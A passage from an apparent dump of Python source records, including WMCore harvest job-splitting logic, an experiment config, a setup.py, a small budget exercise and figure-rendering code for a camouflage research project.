buildLumiMask\n\n\nclass Harvest(JobFactory):\n \"\"\"\n _Harvest_\n\n Job splitting algoritm which creates a single job for all files\n in the fileset (not neccessarily just available files).\n Two distinct modes, Periodic and EndOfRun.\n\n In Periodic mode, we periodically create a job processing all\n files. A job will not be created until the previous job (if\n there is one) has been completed and there are new available\n files in the fileset. The specified period is the amount of\n time in seconds between the end of a job and the creation of\n another job.\n\n In EndOfRun mode, create a job processing all files once the\n input file has been closed. This means there will only be\n a single job in total for the subscription.\n\n For the EndOfRun mode support a sibling parameters that is\n set if there is also a Periodic subscription. In this case\n wait until the Periodic subscription is finished before\n triggering the EndOfRun harvesting.\n\n \"\"\"\n\n def createJobsLocationWise(self, fileset, endOfRun, dqmHarvestUnit, lumiMask, goodRunList):\n\n myThread = threading.currentThread()\n fileset.loadData(parentage=0)\n allFiles = fileset.getFiles()\n\n # sort by location and run\n locationDict = {}\n runDict = {}\n for fileInfo in allFiles:\n\n locSet = frozenset(fileInfo['locations'])\n runSet = fileInfo.getRuns()\n\n if len(locSet) == 0:\n logging.error(\"File %s has no locations!\", fileInfo['lfn'])\n if len(runSet) == 0:\n logging.error(\"File %s has no run information!\", fileInfo['lfn'])\n\n # Populate a dictionary with [location][run] so we can split jobs according to those different combinations\n if locSet not in locationDict:\n locationDict[locSet] = {}\n\n fileInfo['runs'] = set()\n # Handle jobs with run whitelist/blacklist\n if goodRunList:\n runDict[fileInfo['lfn']] = set()\n for run in runSet:\n if run.run in goodRunList:\n runDict[fileInfo['lfn']].add(run)\n if run.run in locationDict[locSet]:\n locationDict[locSet][run.run].append(fileInfo)\n else:\n locationDict[locSet][run.run] = [fileInfo]\n elif lumiMask:\n # it has lumiMask, thus we consider only good run/lumis\n newRunSet = []\n for run in runSet:\n if not isGoodRun(lumiMask, run.run):\n continue\n # then loop over lumis\n maskedLumis = []\n for lumi in run.lumis:\n if not isGoodLumi(lumiMask, run.run, lumi):\n continue\n maskedLumis.append(lumi)\n\n if not maskedLumis:\n continue\n maskedRun = Run(run.run, *maskedLumis)\n newRunSet.append(maskedRun)\n\n if run.run in locationDict[locSet]:\n locationDict[locSet][run.run].append(fileInfo)\n else:\n locationDict[locSet][run.run] = [fileInfo]\n if newRunSet:\n runDict[fileInfo['lfn']] = newRunSet\n else:\n # no LumiList and no run white or black list\n runDict[fileInfo['lfn']] = runSet\n for run in runSet:\n if run.run in locationDict[locSet]:\n locationDict[locSet][run.run].append(fileInfo)\n else:\n locationDict[locSet][run.run] = [fileInfo]\n\n # create separate jobs for different locations\n self.newGroup()\n self.jobCount = 0\n baseName = makeUUID()\n self.newGroup()\n\n if endOfRun:\n harvestType = \"EndOfRun\"\n else:\n harvestType = \"Periodic\"\n\n for location in locationDict:\n\n if dqmHarvestUnit == \"byRun\":\n self.createJobByRun(locationDict, location, baseName, harvestType, runDict, endOfRun)\n else:\n self.createMultiRunJob(locationDict, location, baseName, harvestType, runDict, endOfRun)\n\n return\n\n def createJobByRun(self, locationDict, location, baseName, harvestType, runDict, endOfRun):\n \"\"\"\n _createJobByRun_\n\n Creates one job per run for all files available at the same location.\n \"\"\"\n\n for run in locationDict[location]:\n # Should create at least one job for every location/run, putting this here will do\n self.jobCount += 1\n self.newJob(name=\"%s-%s-Harvest-%i\" % (baseName, harvestType, self.jobCount))\n for f in locationDict[location][run]:\n for fileRun in runDict[f['lfn']]:\n if fileRun.run == run:\n self.currentJob['mask'].addRun(fileRun)\n break\n self.currentJob.addFile(f)\n\n if endOfRun:\n self.currentJob.addBaggageParameter(\"runIsComplete\", True)\n self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])\n return\n\n def createMultiRunJob(self, locationDict, location, baseName, harvestType, runDict, endOfRun):\n \"\"\"\n _createMultiRunJob_\n\n Creates a single harvesting job for all files and runs available\n at the same location.\n \"\"\"\n\n self.jobCount += 1\n self.newJob(name=\"%s-%s-Harvest-%i\" % (baseName, harvestType, self.jobCount))\n for run in locationDict[location]:\n for f in locationDict[location][run]:\n for fileRun in runDict[f['lfn']]:\n if fileRun.run == run:\n self.currentJob['mask'].addRun(fileRun)\n break\n if f not in self.currentJob['input_files']:\n self.currentJob.addFile(f)\n\n if endOfRun:\n self.currentJob.addBaggageParameter(\"runIsComplete\", True)\n self.mergeLumiRange(self.currentJob['mask']['runAndLumis'])\n\n # now calculate the minimum and maximum run number, it has to go to the root name\n minRun = min(self.currentJob['mask']['runAndLumis'].keys())\n maxRun = max(self.currentJob['mask']['runAndLumis'].keys())\n\n self.currentJob.addBaggageParameter(\"multiRun\", True)\n self.currentJob.addBaggageParameter(\"runLimits\", \"-%s-%s\" % (minRun, maxRun))\n\n return\n\n def mergeLumiRange(self, runLumis):\n \"\"\"\n _mergeLumiRange_\n\n Merges the interesection of lumi ranges.\n \"\"\"\n for run, lumis in viewitems(runLumis):\n lumis.sort(key=lambda sublist: sublist[0])\n fixedLumis = [lumis[0]]\n for lumi in lumis:\n if (fixedLumis[-1][1] + 1) >= lumi[0]:\n fixedLumis[-1][1] = lumi[1]\n else:\n fixedLumis.append(lumi)\n self.currentJob['mask']['runAndLumis'][run] = fixedLumis\n\n def algorithm(self, *args, **kwargs):\n \"\"\"\n _algorithm_\n\n \"\"\"\n\n myThread = threading.currentThread()\n\n periodicInterval = kwargs.get(\"periodic_harvest_interval\", 0)\n periodicSibling = kwargs.get(\"periodic_harvest_sibling\", False)\n dqmHarvestUnit = kwargs.get(\"dqmHarvestUnit\", \"byRun\")\n runs = kwargs.get(\"runs\", None)\n lumis = kwargs.get(\"lumis\", None)\n runWhitelist = set(kwargs.get('runWhitelist', []))\n runBlacklist = set(kwargs.get('runBlacklist', []))\n goodRunList = runWhitelist.difference(runBlacklist)\n\n daoFactory = DAOFactory(package=\"WMCore.WMBS\",\n logger=myThread.logger,\n dbinterface=myThread.dbi)\n\n releasePeriodicJobDAO = daoFactory(classname=\"JobSplitting.ReleasePeriodicJob\")\n periodicSiblingCompleteDAO = daoFactory(classname=\"JobSplitting.PeriodicSiblingComplete\")\n\n fileset = self.subscription.getFileset()\n fileset.load()\n\n lumiMask = {}\n if runs and lumis:\n lumiMask = buildLumiMask(runs, lumis)\n\n if periodicInterval and periodicInterval > 0:\n\n # Trigger the Periodic Job if\n # * it is the first job OR\n # * the last job ended more than periodicInterval seconds ago\n triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription[\"id\"], period=periodicInterval)\n\n if triggerJob:\n myThread.logger.debug(\"Creating Periodic harvesting job\")\n self.createJobsLocationWise(fileset, False, dqmHarvestUnit, lumiMask, goodRunList)\n\n elif not fileset.open:\n\n # Trigger the EndOfRun job if\n # * (same as Periodic to not have JobCreator go nuts and stop after the first iteration)\n # * there is no Periodic sibling subscription OR\n # * the Periodic sibling subscription is complete\n triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription[\"id\"], period=3600)\n if triggerJob and periodicSibling:\n triggerJob = periodicSiblingCompleteDAO.execute(subscription=self.subscription[\"id\"])\n\n if triggerJob:\n myThread.logger.debug(\"Creating EndOfRun harvesting job\")\n self.createJobsLocationWise(fileset, True, dqmHarvestUnit, lumiMask, goodRunList)\n\n return\n"} {"ext": "py", "sha": "1a30423226ce9ab558f07c0ade68374e66048de9", "content": "Experiment(description='Trying latest code on classic data sets',\n data_dir='../data/tsdlr-renamed/',\n max_depth=10, \n random_order=False,\n k=1,\n debug=False, \n local_computation=False, \n n_rand=9,\n sd=2, \n jitter_sd=0.1,\n max_jobs=400, \n verbose=False,\n make_predictions=False,\n skip_complete=True,\n results_dir='../results/2014-01-16-GPSS-full/',\n iters=250,\n base_kernels='SE,Per,Lin,Const,Noise',\n random_seed=3,\n period_heuristic=3,\n max_period_heuristic=5,\n period_heuristic_type='min',\n subset=True,\n subset_size=250,\n full_iters=10,\n bundle_size=5,\n additive_form=False,\n mean='ff.MeanZero()', # Starting mean\n kernel='ff.NoiseKernel()', # Starting kernel\n lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood \n score='bic',\n search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),\n ('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),\n ('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),\n ('A', 'B', {'A': 'kernel', 'B': 'base'}),\n ('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),\n ('A', ('None',), {'A': 'kernel'})])\n"} {"ext": "py", "sha": "1a30435be98cac62eb2411e405c70fd46cae1f64", "content": "movie_budget = float(input())\namount_of_statists = int(input())\nprice_for_clothes_for_one_statist = float(input())\n\ndecor = movie_budget * (10/100)\ntotal_price_for_clothes = price_for_clothes_for_one_statist * amount_of_statists\n\nif amount_of_statists > 150:\n total_price_for_clothes *= 0.90\n\ntotal_movie_amount = total_price_for_clothes + decor\n\nif total_price_for_clothes + decor > movie_budget:\n print(\"Not enough money!\")\n print(f\"Wingard needs {total_movie_amount - movie_budget:.2f} leva more.\")\n\nelif total_price_for_clothes + decor <= movie_budget:\n print(\"Action!\")\n print(f\"Wingard starts filming with {movie_budget - total_movie_amount:.2f} leva left.\")"} {"ext": "py", "sha": "1a30438cf9de8ad0ff1abc9511083c8c94a41afd", "content": "from setuptools import setup, find_packages\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nsetup(\n name='Workbench',\n version='0.1.1',\n description='Timesaver for psd2html (markup)',\n long_description=readme,\n author='Bohdan Khorolets',\n author_email='b@khorolets.com',\n url='https://github.com/khorolets/workbench',\n packages=find_packages(),\n entry_points={\n 'console_scripts': [\n 'workbench = workbench.__init__:manager.run',\n ],\n },\n install_requires=list(filter(None, [\n 'flask',\n 'flask-script',\n 'elizabeth',\n ])),\n)\n"} {"ext": "py", "sha": "1a3043bb509bd9f486ffad888b2bad22b07531b8", "content": "import util as ut, glob, os, dset, box, img as ig, experiments, numpy as np, scipy.io, camo, copy, rotation, mvg, imtable, iputil as ip, pylab, planefit, glob, tour\n\n# Code for generating the figures/videos in the paper and the talk\n\nRESDIR_LOO = '/data/scratch/aho/camo-results/camera-ready-loo/loo'\nRESDIR_NOLOO = '/data/scratch/aho/camo-results/camera-ready-noloo/noloo'\n\nSTATS_PATH = '/data/vision/billf/camo/camo/nondetect/results/stats/stats.pk'\n\nALL_SCENES = experiments.classic_scenes + experiments.new_scenes\n\ndef make_path(loo_s, alg_name, scene = ''):\n assert loo_s in ('loo', 'noloo')\n base = RESDIR_LOO if loo_s == 'loo' else RESDIR_NOLOO\n\n return ut.pjoin(base, idx_from_alg(alg_name), scene)\n\ndef idx_from_alg(alg_name):\n return str(METHODS.index(alg_name)+1)\n \ndef path_from_scene(scene):\n return ut.pjoin('../data', scene)\n\n# duplicated from 4-8 in experiments.py\nMETHODS = ['uniform', 'mean', 'random', 'greedy', 'occlusion', 'stable-robust', 'occlusion-wide', 'interior-wide', 'occlusion-wide-nostable']\ntested_scenes = experiments.classic_scenes + experiments.new_scenes\n\ndef make_teaser():\n name = 'bookshelf-real'\n in_dir = make_path('noloo', 'interior-wide', name)\n out_dir = '../results/teaser-bookshelf-interior'\n ut.mkdir(out_dir)\n print in_dir\n for in_fname in sorted(glob.glob(ut.pjoin(in_dir, '*.jpg'))):\n base = os.path.split(in_fname)[1]\n out_fname = ut.pjoin(out_dir, base.replace('.jpg', '.pdf'))\n assert not os.path.exists(out_fname)\n print in_fname, out_fname\n os.system('convert %s %s' % (in_fname, out_fname))\n\ndef make_scene_fig(nscenes = 20, ims_per_scene = 2, todo = ['fig']):\n with ut.constant_seed(0):\n method = 'occlusion-wide'\n # random sample\n #all_scenes = sorted(glob.glob(make_path('noloo', method, '*')))\n #scenes = ut.sample_at_most(all_scenes, nscenes)\n\n #already_in_paper = 'couch3-real bookshelf-real'.split()\n already_in_paper = ''.split()\n \n ok_scenes = []\n # these mess up the diagram\n for scene in tested_scenes:\n shape = dset.Scan(path_from_scene(scene)).full_shape\n ratio = (float(shape[1]) / float(shape[0]))\n if abs(ratio - 1.5 ) >= 0.01 or (scene in already_in_paper):\n print 'skipping', scene, 'bad aspect ratio', ratio, 'or already in paper'\n else:\n ok_scenes.append(scene)\n\n #scenes = ut.sample_at_most(ut.shuffled(scenes), nscenes)\n scenes = ut.sample_at_most(ut.shuffled(ok_scenes), nscenes)\n\n print '\\n'.join(scenes)\n\n if 'show' in todo:\n table = []\n for scene in scenes:\n print scene\n scan = dset.Scan(path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n\n row = [scene]\n assert ims_per_scene == 2\n # show frames from this result\n # choose two that aren't used in the solution and which are representative viewpoints\n # this is nontrivial to do programmatically; pick them by hand\n # include in the UI a way to verify that the same image is not being used\n # note that due to the sampling some views might be of faces that have no label (check this!)\n for frame in scan.frames:\n row += [frame, ('cycle', [mesh.render(scan, frame, texel_colors), scan.im(frame)])]\n table.append(row)\n\n ig.show(table)\n\n if 'fig' in todo:\n frame_choices = \\\n {'mit-31' : 11,\n 'mit-29' : 0,\n 'disrupt-8' : 12,\n 'mit-12': 15,\n 'patio2-real' : 1,\n 'walden-tree1' : 9,\n 'mit-12' : 19,\n 'mit-21' : 8,\n 'charlottesville-6' : 6,\n 'walden-log' : 6,\n 'charlottesville-2' : 8,\n 'charlottesville-9' : 6,\n 'charlottesville-1' : 7,\n 'disrupt-6' : 0,\n 'mit-20' : 3,\n 'mit-14': 13,\n 'walden-tree3' : 0,\n 'mit-6' : 6,\n 'mit-1' : 8,\n 'mit-5' : 16,\n 'couch3-real' : 6,\n 'bookshelf-real' : 3,\n 'charlottesville-7' : 9,\n 'mit-26' : 8,\n 'mit-28' : 13,\n 'mit-13' : 7,\n 'disrupt-11' : 7,\n 'couch5-real' : 2,\n 'walden-brush2' : 0,\n 'mit-9' : 0,\n 'mit-27' : 0,\n 'charlottesville-3' : 1,\n 'mit-37' : 4,\n 'mit-16' : 13,\n }\n\n out_base = '../results/scene-fig'\n #assert not os.path.exists(out_base)\n ut.mkdir(out_base)\n\n scene_acc = ut.load(STATS_PATH)\n\n scenes_by_easiness = sorted(scenes, key = lambda x : -np.mean(scene_acc[x, idx_from_alg(method)]))\n \n for si, scene in enumerate(scenes_by_easiness):\n print scene, np.mean(scene_acc[scene, idx_from_alg(method)])\n\n # easier than deriving the image number from the output files\n scan = dset.Scan(path_from_scene(scene))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n frame = frame_choices[scene]\n #out_path = ut.pjoin(out_base, 'scene-%d.pdf' % (1+si))\n out_path = ut.pjoin(out_base, 'scene-%d.png' % (1+si))\n #assert not os.path.exists(out_path)\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n ig.save(out_path, mesh.render(scan, frame, texel_colors))\n \ndef make_multiview_fig(n = None):\n method = 'occlusion-wide'\n scene_choices = ['mit-1', 'charlottesville-1', 'disrupt-11']\n frame_choices = {'mit-1' : [0, 3, 7, 10], 'charlottesville-1' : [0, 2, 5, 8], 'disrupt-11' : [0, 4, 7, 10]}\n\n out_base = '../results/multiview-fig'\n #assert not os.path.exists(out_base)\n ut.mkdir(out_base)\n \n for si, scene in enumerate(scene_choices[:n]):\n scan = dset.Scan(path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n frames = frame_choices[scene]\n for fi, frame in enumerate(frames):\n out_path = ut.pjoin(out_base, 'scene-%d-%d.png' % (1+si, 1+fi))\n #assert not os.path.exists(out_path)\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n \n #ig.save(out_path, mesh.render(scan, frame, texel_colors))\n #ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True))\n if scene == 'mit-1':\n occ_thresh = 1.25#1.8\n else:\n occ_thresh = None\n\n if scene == 'charlottesville-1':\n occ_thresh = 2.5\n d_sc = 1.2\n else:\n d_sc = 1.\n \n ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True, occ_thresh = occ_thresh, dim_sc = d_sc))\n\n # def dilate_occ(scan, mesh, frame):\n # occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)\n # as_juv = mesh.index_as_juv(occ).copy()\n\n # for j in xrange(as_juv.shape[0]):\n # #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)\n # if np.any(as_juv[j]):\n # dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)\n # dist[ind[0] < 0] = 1e10\n # as_juv[j, dist <= 10] = True\n\n # return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))\n\n\n\ndef clean_occ(scan, mesh, frame):\n occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True)\n as_juv = mesh.index_as_juv(occ).copy()\n\n for j in xrange(as_juv.shape[0]):\n w, h = as_juv.shape[1:]\n for u, v in [(0, range(h)),\n (range(w), 0),\n (range(w), -1),\n (-1, range(h))]:\n as_juv[j, u, v] = (np.mean(as_juv[j, u, v]) >= 0.5)\n \n #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True)\n # if np.any(as_juv[j]):\n # dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True)\n # dist[ind[0] < 0] = 1e10\n # as_juv[j, dist <= 10] = True\n\n return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv))\n\n\ndef scan_fullres(fr, path):\n if fr:\n return dset.Scan(path, max_dim = None)\n else:\n return dset.Scan(path)\n\n \ndef occlusion_mask(scan, mesh, frame, thresh = 2., outline = False):\n mask = box.mask(scan, mesh, frame)\n #D = scipy.ndimage.distance_transform_edt(mask)\n D = scipy.ndimage.distance_transform_edt(mask)\n return D <= thresh, D\n #return np.logical_and(mask, D <= thresh)\n\n\ndef mark_occlusion_texels(tc, scan, mesh, frame, thresh, mesh_occ_mask = None, p = 1):\n tc = tc.copy()\n\n mask = box.mask(scan, mesh, frame)\n if mesh_occ_mask is not None:\n mask = (mask & -mesh_occ_mask)\n \n D = scipy.ndimage.distance_transform_edt(mask)\n \n #occ_mask = np.array(occlusion_mask(scan, mesh, frame, thresh = thresh), 'd')\n occ_mask = np.array(D, 'd')\n \n vis = mesh.texel_visible(scan, frame)\n proj = scan.project(frame, mesh.texel_pts)\n proj = np.array(np.round(proj), 'l')\n occ = np.zeros(mesh.ntexels, 'd')\n occ[vis] = occ_mask[proj[vis, 1], proj[vis, 0]]\n\n w = np.zeros_like(occ)\n w[occ < thresh] = p#1\n \n # scale the texels that are not totally on the boundary\n ok = (thresh <= occ) & (occ < 1+thresh)\n # anti-alias and (optionally) weight\n w[ok] = p*((1+thresh) - occ[ok])\n assert np.all((0 <= w) & (w <= 1))\n tc = tc*(1-w[:, np.newaxis]) + 255*w[:, np.newaxis]\n return tc\n\n\ndef render_cube(scene, mesh, texel_colors, frame, crop_size, fullres = False, outline = False,\n frame_using_cube = False, occ_thresh = None, draw_boundaries = False, im = None, use_fr = True, dim_sc = 1., show_cube = True):\n scan = scan_fullres(fullres, scene)\n \n if im is None:\n im_input = scan.im(frame)\n else:\n im_input = im\n\n tc = texel_colors.copy()\n\n mask = box.mask(scan, mesh, frame)\n ys, xs = np.nonzero(mask)\n cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n\n if frame_using_cube:\n box_rect = ut.bbox2d(np.array([xs, ys]).T)\n d = int(round(dim_sc * min(4*max(box_rect[2:]), min(scan.im(0).shape[:2]) - 1)))\n rect = ut.rect_centered_at(cx, cy, d, d)\n rect = ut.shift_in_bounds(scan.im(0).shape, rect)\n scale = float(crop_size)/rect[2]\n print box_rect, rect, scale\n else:\n rect = None\n scale = 1.\n\n # if not show_cube:\n # im = scan.im(frame)\n # rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)\n # crop_size /= scan_fullres(False, scan.path).scale\n # return ig.sub_img(im, ut.rect_im_intersect(im, rect))\n \n if outline:\n if rect is not None:\n assert rect[2] == rect[3]\n #scan_fr = scan_fullres(True, scene)\n scan_fr = scan_fullres(use_fr, scene)\n print 'scale', scale\n\n if occ_thresh is None:\n occ_thresh = 2.\n occ_thresh /= scale\n\n # occ = camo.occlusion_texels(scan_fr, mesh, frame, thresh = occ_thresh, only_border = False)\n # tc[occ] = 255\n\n \n tc = mark_occlusion_texels(tc, scan_fr, mesh, frame, thresh = occ_thresh)\n \n im_up = ig.resize(im_input, scan_fr.im(frame).shape)\n #im = ig.resize(mesh.render(scan_fr, frame, tc, im = im_up), scan.im(frame).shape)\n im_fr = mesh.render(scan_fr, frame, tc, im = im_up)\n im = ig.resize(im_fr, scan.im(frame).shape)\n if not show_cube:\n im = scan.im(frame)\n #ig.show([im_fr, im])\n #assert im.shape[0] == im.shape[1]\n else:\n if show_cube:\n im = mesh.render(scan, frame, tc)\n else:\n im = scan.im(frame)\n \n \n if rect is not None:\n if draw_boundaries:\n return ig.draw_rects(im, [rect])\n else:\n return ig.sub_img(im, rect)\n if fullres:\n crop_size /= scan_fullres(False, scan.path).scale\n #sc = (crop_size/2.)/float(box_rect[2])\n elif crop_size is None:\n return im\n else:\n rect = ut.rect_centered_at(cx, cy, crop_size, crop_size)\n return ig.sub_img(im, ut.rect_im_intersect(im, rect))\n \ndef make_real_cube():\n scene = 'bookshelf-real'\n method = 'interior-wide'\n scan = dset.Scan(path_from_scene(scene))\n\n #texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])\n if 0:\n print 'hires'\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)\n scan = dset.Scan(path_from_scene(scene), max_dim = 2000)\n texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'interior-wide'))\n ut.save('../results/real-interior.pk', texel_colors)\n ut.toplevel_locals()\n elif 1:\n # upgrade to larger texel size; bigger images\n texel_colors0, results0, labels0 = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][:3]\n mesh0 = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 256)\n texsize = 1024\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)\n geom = camo.Geom(scan, mesh)\n scan = dset.Scan(path_from_scene(scene), max_dim = 2000)\n label_color, label_valid = camo.label_colors(scan, mesh, geom, labels0, invisible_colors = True)\n\n as_juv0 = mesh0.index_as_juv(results0).copy()\n as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()\n\n for j in xrange(as_juv0.shape[0]):\n as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)\n results1 = np.array(mesh.index_as_flat(as_juv1), 'l')\n\n texel_colors = camo.from_color_space_2d(label_color[range(len(results1)), results1])\n #texel_colors = label_color[range(len(results1)), results1]\n\n ut.toplevel_locals()\n elif 0:\n texel_colors = ut.load('../results/real-interior.pk')[0]\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)\n else:\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n \n texel_colors = camo.to_color_space_2d(texel_colors)\n texel_colors = mesh.index_as_juv(texel_colors)\n out_path = '../results/real/colors.mat'\n scipy.io.savemat(out_path, {'texel_colors' : texel_colors})\n import matlab\n matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')\n\ndef make_printable_pattern(scene_path, mesh0, texel_colors0, results0, labels0, geom = None):\n #texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])\n # upgrade to larger texel size; bigger images\n #texsize = 1024\n texsize = 4096\n #scan = dset.Scan(scene_path, max_dim = 2000)\n scan = dset.Scan(scene_path, max_dim = None)\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)\n \n\n as_juv0 = mesh0.index_as_juv(results0).copy()\n as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()\n\n for j in xrange(as_juv0.shape[0]):\n as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)\n \n results1 = np.array(mesh.index_as_flat(as_juv1), 'l')\n\n labels = np.array(labels0, 'double')\n labels[:, 1:] *= scan.scale/dset.Scan(scene_path).scale\n\n print labels\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n\n if geom is None:\n geom = camo.Geom(scan, mesh)\n \n print len(np.unique(results1))\n for label in np.unique(results1):\n print 'trying', label\n label = int(label)\n frame = int(labels[label, 0])\n valid, colors = camo.project_texels(scan, frame, mesh, scan.im(frame), geom, labels[label, 1:])\n ok = results1 == label\n texel_colors[ok] = colors[ok]\n \n #texel_colors = label_color[range(len(results1)), results1]\n\n texel_colors_rgb = texel_colors.copy()\n \n ut.toplevel_locals()\n\n #texel_colors = camo.to_color_space_2d(texel_colors)\n texel_colors = mesh.index_as_juv(texel_colors)\n out_path = '../results/real/colors.mat'\n scipy.io.savemat(out_path, {'texel_colors' : texel_colors, 'texel_colors_rgb' : texel_colors_rgb})\n\n\n # import matlab\n # matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')\n\n\ndef make_rescomp_fig(n = None):\n table = []\n # index frames to be consistent w/ amt results\n\n comparisons = [\n ('mit-20', 3, ['occlusion-wide', 'interior-wide']),\n ('disrupt-14', 4, ['occlusion-wide', 'random']),\n ('disrupt-14', 5, ['occlusion-wide', 'random']),\n ('disrupt-14', 3, ['occlusion-wide', 'random']),\n ]\n\n #scene_acc = ut.load(STATS_PATH)\n\n #out_dir = '../results/qual-compare'\n out_dir = '../results/qual-compare2'\n ut.mkdir(out_dir)\n num = 0\n for scene, loo_idx, methods in comparisons:\n scan = scan_fullres(False, path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n table.append([])\n\n for method in methods:\n data = ut.load(ut.pjoin(make_path('loo', method, scene), 'data_%03d.pk' % loo_idx))\n texel_colors = data['ret'][0]\n loo_frame = scan.idx.index(data['pr'].loo_frame_idx)\n\n im = render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = True, frame_using_cube = True)\n assert im.shape[0] == im.shape[1]\n table[-1] += [method, im]\n #table[-1] += [method, render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = False)]\n ig.save(ut.pjoin(out_dir, 'result-%03d.pdf' % num), im)\n ig.save(ut.pjoin(out_dir, 'result-%03d.png' % num), im)\n num += 1\n ig.show(table)\n\ndef count_ims():\n total = 0\n for scene in ALL_SCENES:\n path = make_path('loo', 'interior-wide', scene)\n nims = len(glob.glob(path + '/result_*.jpg'))\n total += nims\n print scene, nims\n print 'total images', total, 'scenes', len(ALL_SCENES)\n \n\ndef draw_grid(im, proj, spacing = [-1, 0, 1]):\n d = 30.\n for x in spacing:\n for y in spacing:\n if x < 1:\n im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x+1, y])], colors = (255, 255, 255))\n if y < 1:\n im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x, y+1])], colors = (255, 255, 255))\n return im\n \ndef make_project_fig():\n #scene = 'mit-35'\n scene = 'mit-37'\n path = make_path('noloo', 'interior-wide', scene)\n #texel_colors = ut.load(ut.pjoin(path, 'data.pk'))['ret'][0]\n \n scan = dset.Scan(path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n scan = dset.Scan(path_from_scene(scene))\n frames = range(scan.length)#[scan.length-1] #range(scan.length)[:1]\n\n geom = camo.Geom(scan, mesh)\n\n #texel = mesh.juv2tex[5, 128, 128]\n texel = mesh.juv2tex[2, 128, 128]\n \n table = []\n for frame in frames:\n proj = scan.project(frame, mesh.texel_pts[texel])\n im_grid = draw_grid(scan.im(frame), proj)\n label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)\n im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)\n table.append([im, scan.im(frame)])\n #table.append(ig.draw_pts(im, proj))\n\n ig.show(table)\n \n\ndef find_best_algs():\n with ut.constant_seed():\n scene_acc = ut.load(STATS_PATH)\n for scene in ALL_SCENES:\n algs = ['greedy', 'interior-wide', 'occlusion-wide']\n acc = [np.mean(scene_acc[scene, idx_from_alg(alg)]) for alg in algs]\n i = np.argmin(acc)\n #print scene, algs[i], acc\n yield scene, algs[i]\n\ndef label_plane(seq, root = 0, y_flip = True):\n scan = dset.Scan(seq, None)\n _, _, tracks = dset.read_bundler(scan.bundle_file, scan.full_shape)\n pts = np.array([t[0] for t in tracks])\n \n proj = scan.project(root, pts)\n\n pylab.clf()\n im_with_pts = ig.draw_pts(scan.im(root), proj, width = 2)\n pylab.imshow(im_with_pts)\n rect = ut.bbox2d(pylab.ginput(2, timeout = -1))\n #rect = (1782.005828476269, 1431.7364696086595, 529.75936719400488, 354.40549542048279)\n print rect\n\n ok = ut.land(rect[0] <= proj[:, 0], proj[:, 